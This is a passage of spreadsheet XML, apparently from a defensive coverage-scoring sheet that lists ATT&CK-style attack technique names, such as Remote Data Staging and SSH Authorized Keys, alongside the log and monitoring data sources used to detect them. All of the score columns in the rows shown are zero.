        <f>LOOKUP(A64,'REF-DataSources'!A:B)</f>
        <v>Hypervisor</v>
      </c>
      <c r="C64" s="45"/>
      <c r="D64" s="45"/>
      <c r="E64" s="45"/>
      <c r="F64" s="14">
        <v>0</v>
      </c>
      <c r="G64" s="14">
        <v>0</v>
      </c>
      <c r="H64" s="14">
        <v>0</v>
      </c>
      <c r="I64" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K64" s="46" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
    </row>
    <row r="65" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A65" s="43" t="s">
        <v>145</v>
      </c>
      <c r="B65" s="41" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C65" s="45"/>
      <c r="D65" s="45"/>
      <c r="E65" s="45"/>
      <c r="F65" s="14">
        <v>0</v>
      </c>
      <c r="G65" s="14">
        <v>0</v>
      </c>
      <c r="H65" s="14">
        <v>0</v>
      </c>
      <c r="I65" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K65" s="46" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="66" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A66" s="43" t="s">
        <v>147</v>
      </c>
      <c r="B66" s="41" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C66" s="45"/>
      <c r="D66" s="45"/>
      <c r="E66" s="45"/>
      <c r="F66" s="14">
        <v>0</v>
      </c>
      <c r="G66" s="14">
        <v>0</v>
      </c>
      <c r="H66" s="14">
        <v>0</v>
      </c>
      <c r="I66" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K66" s="46" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="67" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A67" s="43" t="s">
        <v>148</v>
      </c>
      <c r="B67" s="41" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C67" s="45"/>
      <c r="D67" s="45"/>
      <c r="E67" s="45"/>
      <c r="F67" s="14">
        <v>0</v>
      </c>
      <c r="G67" s="14">
        <v>0</v>
      </c>
      <c r="H67" s="14">
        <v>0</v>
      </c>
      <c r="I67" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K67" s="46" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="68" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A68" s="43" t="s">
        <v>149</v>
      </c>
      <c r="B68" s="41" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:B)</f>
        <v>Scripting</v>
      </c>
      <c r="C68" s="45"/>
      <c r="D68" s="45"/>
      <c r="E68" s="45"/>
      <c r="F68" s="14">
        <v>0</v>
      </c>
      <c r="G68" s="14">
        <v>0</v>
      </c>
      <c r="H68" s="14">
        <v>0</v>
      </c>
      <c r="I68" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K68" s="46" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="69" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A69" s="43" t="s">
        <v>151</v>
      </c>
      <c r="B69" s="41" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Privilege Escalation</v>
      </c>
      <c r="C69" s="45"/>
      <c r="D69" s="45"/>
      <c r="E69" s="45"/>
      <c r="F69" s="14">
        <v>0</v>
      </c>
      <c r="G69" s="14">
        <v>0</v>
      </c>
      <c r="H69" s="14">
        <v>0</v>
      </c>
      <c r="I69" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K69" s="46" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,Application logs</v>
      </c>
    </row>
    <row r="70" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A70" s="43" t="s">
        <v>153</v>
      </c>
      <c r="B70" s="41" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:B)</f>
        <v>Permission Groups Discovery</v>
      </c>
      <c r="C70" s="45"/>
      <c r="D70" s="45"/>
      <c r="E70" s="45"/>
      <c r="F70" s="14">
        <v>0</v>
      </c>
      <c r="G70" s="14">
        <v>0</v>
      </c>
      <c r="H70" s="14">
        <v>0</v>
      </c>
      <c r="I70" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K70" s="46" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="71" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A71" s="43" t="s">
        <v>154</v>
      </c>
      <c r="B71" s="41" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:B)</f>
        <v>Indicator Removal on Host</v>
      </c>
      <c r="C71" s="45"/>
      <c r="D71" s="45"/>
      <c r="E71" s="45"/>
      <c r="F71" s="14">
        <v>0</v>
      </c>
      <c r="G71" s="14">
        <v>0</v>
      </c>
      <c r="H71" s="14">
        <v>0</v>
      </c>
      <c r="I71" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K71" s="46" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</v>
      </c>
    </row>
    <row r="72" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A72" s="43" t="s">
        <v>155</v>
      </c>
      <c r="B72" s="41" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:B)</f>
        <v>Application Layer Protocol</v>
      </c>
      <c r="C72" s="45"/>
      <c r="D72" s="45"/>
      <c r="E72" s="45"/>
      <c r="F72" s="14">
        <v>0</v>
      </c>
      <c r="G72" s="14">
        <v>0</v>
      </c>
      <c r="H72" s="14">
        <v>0</v>
      </c>
      <c r="I72" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K72" s="46" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:C)</f>
        <v>DNS records,Network protocol analysis,Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="73" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A73" s="43" t="s">
        <v>157</v>
      </c>
      <c r="B73" s="41" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:B)</f>
        <v>Software Deployment Tools</v>
      </c>
      <c r="C73" s="45"/>
      <c r="D73" s="45"/>
      <c r="E73" s="45"/>
      <c r="F73" s="14">
        <v>0</v>
      </c>
      <c r="G73" s="14">
        <v>0</v>
      </c>
      <c r="H73" s="14">
        <v>0</v>
      </c>
      <c r="I73" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K73" s="46" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
    </row>
    <row r="74" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A74" s="43" t="s">
        <v>159</v>
      </c>
      <c r="B74" s="41" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:B)</f>
        <v>Software Deployment Tools</v>
      </c>
      <c r="C74" s="45"/>
      <c r="D74" s="45"/>
      <c r="E74" s="45"/>
      <c r="F74" s="14">
        <v>0</v>
      </c>
      <c r="G74" s="14">
        <v>0</v>
      </c>
      <c r="H74" s="14">
        <v>0</v>
      </c>
      <c r="I74" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K74" s="46" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
    </row>
    <row r="75" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A75" s="43" t="s">
        <v>160</v>
      </c>
      <c r="B75" s="41" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:B)</f>
        <v>Data Staged</v>
      </c>
      <c r="C75" s="45"/>
      <c r="D75" s="45"/>
      <c r="E75" s="45"/>
      <c r="F75" s="14">
        <v>0</v>
      </c>
      <c r="G75" s="14">
        <v>0</v>
      </c>
      <c r="H75" s="14">
        <v>0</v>
      </c>
      <c r="I75" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K75" s="46" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="76" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A76" s="43" t="s">
        <v>161</v>
      </c>
      <c r="B76" s="41" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C76" s="45"/>
      <c r="D76" s="45"/>
      <c r="E76" s="45"/>
      <c r="F76" s="14">
        <v>0</v>
      </c>
      <c r="G76" s="14">
        <v>0</v>
      </c>
      <c r="H76" s="14">
        <v>0</v>
      </c>
      <c r="I76" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K76" s="46" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="77" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A77" s="43" t="s">
        <v>162</v>
      </c>
      <c r="B77" s="41" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C77" s="45"/>
      <c r="D77" s="45"/>
      <c r="E77" s="45"/>
      <c r="F77" s="14">
        <v>0</v>
      </c>
      <c r="G77" s="14">
        <v>0</v>
      </c>
      <c r="H77" s="14">
        <v>0</v>
      </c>
      <c r="I77" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K77" s="46" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="78" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A78" s="43" t="s">
        <v>163</v>
      </c>
      <c r="B78" s="41" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C78" s="45"/>
      <c r="D78" s="45"/>
      <c r="E78" s="45"/>
      <c r="F78" s="14">
        <v>0</v>
      </c>
      <c r="G78" s="14">
        <v>0</v>
      </c>
      <c r="H78" s="14">
        <v>0</v>
      </c>
      <c r="I78" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K78" s="46" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="79" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A79" s="43" t="s">
        <v>165</v>
      </c>
      <c r="B79" s="41" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:B)</f>
        <v>Valid Accounts</v>
      </c>
      <c r="C79" s="45"/>
      <c r="D79" s="45"/>
      <c r="E79" s="45"/>
      <c r="F79" s="14">
        <v>0</v>
      </c>
      <c r="G79" s="14">
        <v>0</v>
      </c>
      <c r="H79" s="14">
        <v>0</v>
      </c>
      <c r="I79" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K79" s="46" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:C)</f>
        <v>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</v>
      </c>
    </row>
    <row r="80" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A80" s="43" t="s">
        <v>167</v>
      </c>
      <c r="B80" s="41" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:B)</f>
        <v>Cloud Accounts</v>
      </c>
      <c r="C80" s="45"/>
      <c r="D80" s="45"/>
      <c r="E80" s="45"/>
      <c r="F80" s="14">
        <v>0</v>
      </c>
      <c r="G80" s="14">
        <v>0</v>
      </c>
      <c r="H80" s="14">
        <v>0</v>
      </c>
      <c r="I80" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K80" s="46" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Authentication logs,AWS CloudTrail logs,Stackdriver logs</v>
      </c>
    </row>
    <row r="81" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A81" s="43" t="s">
        <v>169</v>
      </c>
      <c r="B81" s="41" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:B)</f>
        <v>Taint Shared Content</v>
      </c>
      <c r="C81" s="45"/>
      <c r="D81" s="45"/>
      <c r="E81" s="45"/>
      <c r="F81" s="14">
        <v>0</v>
      </c>
      <c r="G81" s="14">
        <v>0</v>
      </c>
      <c r="H81" s="14">
        <v>0</v>
      </c>
      <c r="I81" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K81" s="46" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="82" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A82" s="43" t="s">
        <v>170</v>
      </c>
      <c r="B82" s="41" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:B)</f>
        <v>Taint Shared Content</v>
      </c>
      <c r="C82" s="45"/>
      <c r="D82" s="45"/>
      <c r="E82" s="45"/>
      <c r="F82" s="14">
        <v>0</v>
      </c>
      <c r="G82" s="14">
        <v>0</v>
      </c>
      <c r="H82" s="14">
        <v>0</v>
      </c>
      <c r="I82" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K82" s="46" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="83" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A83" s="43" t="s">
        <v>171</v>
      </c>
      <c r="B83" s="41" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:B)</f>
        <v>System Information Discovery</v>
      </c>
      <c r="C83" s="45"/>
      <c r="D83" s="45"/>
      <c r="E83" s="45"/>
      <c r="F83" s="14">
        <v>0</v>
      </c>
      <c r="G83" s="14">
        <v>0</v>
      </c>
      <c r="H83" s="14">
        <v>0</v>
      </c>
      <c r="I83" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K83" s="46" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="84" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A84" s="43" t="s">
        <v>172</v>
      </c>
      <c r="B84" s="41" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C84" s="45"/>
      <c r="D84" s="45"/>
      <c r="E84" s="45"/>
      <c r="F84" s="14">
        <v>0</v>
      </c>
      <c r="G84" s="14">
        <v>0</v>
      </c>
      <c r="H84" s="14">
        <v>0</v>
      </c>
      <c r="I84" s="32">
        <f t="shared" ref="I84:I147" si="3">((F84*2)+G84+(H84*2))/5</f>
        <v>0</v>
      </c>
      <c r="K84" s="46" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="85" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A85" s="43" t="s">
        <v>173</v>
      </c>
      <c r="B85" s="41" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C85" s="45"/>
      <c r="D85" s="45"/>
      <c r="E85" s="45"/>
      <c r="F85" s="14">
        <v>0</v>
      </c>
      <c r="G85" s="14">
        <v>0</v>
      </c>
      <c r="H85" s="14">
        <v>0</v>
      </c>
      <c r="I85" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K85" s="46" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="86" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A86" s="43" t="s">
        <v>174</v>
      </c>
      <c r="B86" s="41" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C86" s="45"/>
      <c r="D86" s="45"/>
      <c r="E86" s="45"/>
      <c r="F86" s="14">
        <v>0</v>
      </c>
      <c r="G86" s="14">
        <v>0</v>
      </c>
      <c r="H86" s="14">
        <v>0</v>
      </c>
      <c r="I86" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K86" s="46" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="87" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A87" s="43" t="s">
        <v>176</v>
      </c>
      <c r="B87" s="41" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C87" s="45"/>
      <c r="D87" s="45"/>
      <c r="E87" s="45"/>
      <c r="F87" s="14">
        <v>0</v>
      </c>
      <c r="G87" s="14">
        <v>0</v>
      </c>
      <c r="H87" s="14">
        <v>0</v>
      </c>
      <c r="I87" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K87" s="46" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="88" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A88" s="43" t="s">
        <v>178</v>
      </c>
      <c r="B88" s="41" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:B)</f>
        <v>Account Discovery</v>
      </c>
      <c r="C88" s="45"/>
      <c r="D88" s="45"/>
      <c r="E88" s="45"/>
      <c r="F88" s="14">
        <v>0</v>
      </c>
      <c r="G88" s="14">
        <v>0</v>
      </c>
      <c r="H88" s="14">
        <v>0</v>
      </c>
      <c r="I88" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K88" s="46" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="89" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A89" s="43" t="s">
        <v>179</v>
      </c>
      <c r="B89" s="41" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:B)</f>
        <v>Cloud Account</v>
      </c>
      <c r="C89" s="45"/>
      <c r="D89" s="45"/>
      <c r="E89" s="45"/>
      <c r="F89" s="14">
        <v>0</v>
      </c>
      <c r="G89" s="14">
        <v>0</v>
      </c>
      <c r="H89" s="14">
        <v>0</v>
      </c>
      <c r="I89" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K89" s="46" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="90" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A90" s="43" t="s">
        <v>181</v>
      </c>
      <c r="B90" s="41" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:B)</f>
        <v>Cloud Account</v>
      </c>
      <c r="C90" s="45"/>
      <c r="D90" s="45"/>
      <c r="E90" s="45"/>
      <c r="F90" s="14">
        <v>0</v>
      </c>
      <c r="G90" s="14">
        <v>0</v>
      </c>
      <c r="H90" s="14">
        <v>0</v>
      </c>
      <c r="I90" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K90" s="46" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="91" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A91" s="43" t="s">
        <v>183</v>
      </c>
      <c r="B91" s="41" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:B)</f>
        <v>Proxy</v>
      </c>
      <c r="C91" s="45"/>
      <c r="D91" s="45"/>
      <c r="E91" s="45"/>
      <c r="F91" s="14">
        <v>0</v>
      </c>
      <c r="G91" s="14">
        <v>0</v>
      </c>
      <c r="H91" s="14">
        <v>0</v>
      </c>
      <c r="I91" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K91" s="46" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</v>
      </c>
    </row>
    <row r="92" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A92" s="43" t="s">
        <v>185</v>
      </c>
      <c r="B92" s="41" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:B)</f>
        <v>Replication Through Removable Media</v>
      </c>
      <c r="C92" s="45"/>
      <c r="D92" s="45"/>
      <c r="E92" s="45"/>
      <c r="F92" s="14">
        <v>0</v>
      </c>
      <c r="G92" s="14">
        <v>0</v>
      </c>
      <c r="H92" s="14">
        <v>0</v>
      </c>
      <c r="I92" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K92" s="46" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
    </row>
    <row r="93" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A93" s="43" t="s">
        <v>186</v>
      </c>
      <c r="B93" s="41" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C93" s="45"/>
      <c r="D93" s="45"/>
      <c r="E93" s="45"/>
      <c r="F93" s="14">
        <v>0</v>
      </c>
      <c r="G93" s="14">
        <v>0</v>
      </c>
      <c r="H93" s="14">
        <v>0</v>
      </c>
      <c r="I93" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K93" s="46" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
    </row>
    <row r="94" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A94" s="43" t="s">
        <v>187</v>
      </c>
      <c r="B94" s="41" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C94" s="45"/>
      <c r="D94" s="45"/>
      <c r="E94" s="45"/>
      <c r="F94" s="14">
        <v>0</v>
      </c>
      <c r="G94" s="14">
        <v>0</v>
      </c>
      <c r="H94" s="14">
        <v>0</v>
      </c>
      <c r="I94" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K94" s="46" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
    </row>
    <row r="95" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A95" s="43" t="s">
        <v>188</v>
      </c>
      <c r="B95" s="41" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C95" s="45"/>
      <c r="D95" s="45"/>
      <c r="E95" s="45"/>
      <c r="F95" s="14">
        <v>0</v>
      </c>
      <c r="G95" s="14">
        <v>0</v>
      </c>
      <c r="H95" s="14">
        <v>0</v>
      </c>
      <c r="I95" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K95" s="46" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
    </row>
    <row r="96" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A96" s="43" t="s">
        <v>190</v>
      </c>
      <c r="B96" s="41" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C96" s="45"/>
      <c r="D96" s="45"/>
      <c r="E96" s="45"/>
      <c r="F96" s="14">
        <v>0</v>
      </c>
      <c r="G96" s="14">
        <v>0</v>
      </c>
      <c r="H96" s="14">
        <v>0</v>
      </c>
      <c r="I96" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K96" s="46" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
    </row>
    <row r="97" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A97" s="43" t="s">
        <v>192</v>
      </c>
      <c r="B97" s="41" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C97" s="45"/>
      <c r="D97" s="45"/>
      <c r="E97" s="45"/>
      <c r="F97" s="14">
        <v>0</v>
      </c>
      <c r="G97" s="14">
        <v>0</v>
      </c>
      <c r="H97" s="14">
        <v>0</v>
      </c>
      <c r="I97" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K97" s="46" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
    </row>
    <row r="98" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A98" s="43" t="s">
        <v>194</v>
      </c>
      <c r="B98" s="41" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C98" s="45"/>
      <c r="D98" s="45"/>
      <c r="E98" s="45"/>
      <c r="F98" s="14">
        <v>0</v>
      </c>
      <c r="G98" s="14">
        <v>0</v>
      </c>
      <c r="H98" s="14">
        <v>0</v>
      </c>
      <c r="I98" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K98" s="46" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
    </row>
    <row r="99" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A99" s="43" t="s">
        <v>195</v>
      </c>
      <c r="B99" s="41" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:B)</f>
        <v>Account Manipulation</v>
      </c>
      <c r="C99" s="45"/>
      <c r="D99" s="45"/>
      <c r="E99" s="45"/>
      <c r="F99" s="14">
        <v>0</v>
      </c>
      <c r="G99" s="14">
        <v>0</v>
      </c>
      <c r="H99" s="14">
        <v>0</v>
      </c>
      <c r="I99" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K99" s="46" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
    </row>
    <row r="100" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A100" s="43" t="s">
        <v>196</v>
      </c>
      <c r="B100" s="41" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C100" s="45"/>
      <c r="D100" s="45"/>
      <c r="E100" s="45"/>
      <c r="F100" s="14">
        <v>0</v>
      </c>
      <c r="G100" s="14">
        <v>0</v>
      </c>
      <c r="H100" s="14">
        <v>0</v>
      </c>
      <c r="I100" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K100" s="46" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="101" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A101" s="43" t="s">
        <v>198</v>
      </c>
      <c r="B101" s="41" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C101" s="45"/>
      <c r="D101" s="45"/>
      <c r="E101" s="45"/>
      <c r="F101" s="14">
        <v>0</v>
      </c>
      <c r="G101" s="14">
        <v>0</v>
      </c>
      <c r="H101" s="14">
        <v>0</v>
      </c>
      <c r="I101" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K101" s="46" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="102" spans="1:11" x14ac:dyDescent="0.2">
